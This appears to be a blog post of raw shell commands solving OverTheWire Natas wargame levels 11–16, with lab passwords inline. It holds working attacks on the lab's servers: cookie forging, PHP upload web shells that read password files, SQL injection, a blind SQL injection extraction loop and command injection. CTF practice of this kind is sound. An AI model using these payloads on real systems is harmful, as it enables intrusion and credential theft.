Level 11
#Level 12wget --quiet -O - --user=natas11 --password=SUIRtXqbB3tWzTOgTAX2t8UfMbYKrgp6 --post-data "submit=&bgcolor=#ffffff" --keep-session-cookies --save-cookies natas11.cookie http://natas11.natas.labs.overthewire.org
#cat xor_encrypt
#grep natas natas11.cookie
#./xor_encrypt ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw
#cat set_cookie
#./set_cookie qw8J
#string=`./set_cookie qw8J`
#sed -i "s/data\t.*%3D/data\t$string/" natas11.cookie
#wget --quiet -O - --user=natas11 --password=SUIRtXqbB3tWzTOgTAX2t8UfMbYKrgp6 --post-data 'submit=&bgcolor=#ffffff' --load-cookies natas11.cookie --keep-session-cookies --save-cookies natas11.cookie http://natas11.natas.labs.overthewire.org | grep natas12 | awk '{print $6}' | cut -b -32
#Level 13curl --silent --user natas12:sh7DrWKtb8xw9PIMkh8OQsgno6iZnJQu --request POST --header "Content-Type: multipart/form-data; boundary=#" --data $'--#\r\nContent-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n1000\r\n--#\r\nContent-Disposition: form-data; name="filename"\r\n\r\nfuckyou.php\r\n--#\r\nContent-Disposition: form-data; name="uploadedfile"; filename="fuckyou.php"\r\nContent-Type: application/x-php\r\n\r\n<?php readfile("/etc/natas_webpass/natas13");?>\r\n--#--\r\n\r\n' http://natas12.natas.labs.overthewire.org | grep upload | awk -F\" '{print $2}'
#curl --silent --user natas12:sh7DrWKtb8xw9PIMkh8OQsgno6iZnJQu http://natas12.natas.labs.overthewire.org/upload/oijrt0cyhv.php
#Level 14curl --silent --user natas13:IGCXqS4x472aoHZYaidvmeoWj2GmuRYz --request POST --header "Content-Type: multipart/form-data; boundary=#" --data $'--#\r\nContent-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n1000\r\n--#\r\nContent-Disposition: form-data; name="filename"\r\n\r\nfuckyou.php\r\n--#\r\nContent-Disposition: form-data; name="uploadedfile"; filename="fuckyou.php"\r\nContent-Type: image/jpg\r\n\r\n'"`echo -n "ffd8ff" | xxd -p -r`"$'<?php readfile("/etc/natas_webpass/natas14");?>\r\n--#--\r\n\r\n' http://natas13.natas.labs.overthewire.org | grep upload | awk -F\" '{print $2}'
#curl --silent --user natas13:IGCXqS4x472aoHZYaidvmeoWj2GmuRYz http://natas13.natas.labs.overthewire.org/upload/pmg8woiyek.php | cut -b 4-
# curl --silent --user natas14:sSkCeug1bdrYejzAaBhgwI3qJXDKqlgh --request POST --data "username=\"or true#" http://natas14.natas.labs.overthewire.org | grep natas15 | awk '{print $8}' | cut -b -32
Level 15#Level 16j=1; while [ true ]; do result=`curl --silent --user natas15:m2azll7JH6HS8Ay3SOjG3AGGlDGTJSTV --request POST --data "username=natas16\" and length(password)=$j#" http://natas15.natas.labs.overthewire.org | grep "This user exists"` ; if [ "$result" != "" ]; then echo $j; break; fi; j=$[$j+1]; done
#for i in `seq $j`; do for k in `seq 33 126`; do result=`curl --silent --user natas15:m2azll7JH6HS8Ay3SOjG3AGGlDGTJSTV --request POST --data "username=natas16\" and ascii(substr((select password),$i,1))=$k#" http://natas15.natas.labs.overthewire.org | grep "This user exists"` ; if [ "$result" != "" ]; then echo "obase=16;ibase=10;$k" | bc -l | xxd -p -r ; break; fi; done; done; echo
3VfCzgaWjEAcmCQphiEPoXi9HtlmVr3L
#wget --quiet -O - --user=natas16 --password=3VfCzgaWjEAcmCQphiEPoXi9HtlmVr3L --post-data 'submit=&needle=$(cat /etc/natas_webpass/natas17 > /tmp/natas17)' http://natas16.natas.labs.overthewire.org > /dev/null
#wget --quiet -O - --user=natas9 --password=sQ6DKR8ICwqDMTd48lQlJfbF1q9B3edT --post-data 'submit=&needle=;cat /tmp/natas17;' http://natas9.natas.labs.overthewire.org | grep -v -e ^$ -e ^\< | tail -n 1
No comments:
Post a Comment